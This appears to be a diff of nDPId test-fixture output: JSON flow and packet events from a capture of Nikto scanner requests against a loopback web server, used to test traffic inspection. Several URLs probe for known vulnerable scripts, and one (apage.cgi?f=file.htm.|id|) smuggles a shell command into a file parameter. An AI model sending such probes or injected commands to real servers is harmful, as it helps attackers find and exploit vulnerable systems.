+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} 
+01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} 
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} 
+01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
